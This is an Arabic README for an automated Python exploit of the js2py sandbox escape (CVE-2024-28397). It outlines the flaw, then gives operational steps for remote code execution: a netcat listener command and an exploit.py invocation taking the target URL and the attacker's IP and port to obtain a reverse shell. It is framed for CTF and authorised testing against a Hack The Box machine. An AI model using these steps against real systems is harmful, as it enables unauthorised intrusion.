
نص برمجي لأتمتة Python لاستغلال ثغرة **js2py Sandbox Escape** (CVE-2024-28397). تعمل هذه الأداة على أتمتة عملية توليد الحمولة وتسليمها لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) على الأنظمة المعرضة للخطر.
نص برمجي بأتمتة بايثون لاستغلال ثغرة js2py Sandbox Escape (CVE-2024-28397). تقوم هذه الأداة بأتمتة عملية توليد الحمولة وتسليمها لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) على الأنظمة القابلة للاستغلال.
⚠️ إخلاء المسؤولية القانونية استخدام هذه الأداة لمهاجمة الأهداف دون موافقة مسبقة من الطرفين يُعد غير قانوني. هذا المستودع لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام لهذه المعلومات. صُممت هذه الأداة لتُستخدم في اختبارات الاختراق المصرح بها وبيئات مسابقات Capture The Flag (CTF).
تؤثر CVE-2024-28397 على مكتبة js2py (الإصدارات < 0.74). تفشل المكتبة في عزل بيئة الجافاسكربت بشكل صحيح عن بيئة بايثون المضيفة.
__class__ و __subclasses__ في بايثون.subprocess.Popen، مما يتيح تنفيذ أوامر عشوائية على الخادم المضيف.pip install requests
ابدأ مستمع Netcat :
nc -lvnp 1337
شغّل السكربت :
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>
إليك الأداة أثناء عملها ضد هدف قابل للاستغلال (Hack The Box - CodeTwo):
تشغيل الاستغلال لتوليد الحمولة وتحفيز الاستدعاء الراجع:

استلام الصدفة العكسية على المستمع:
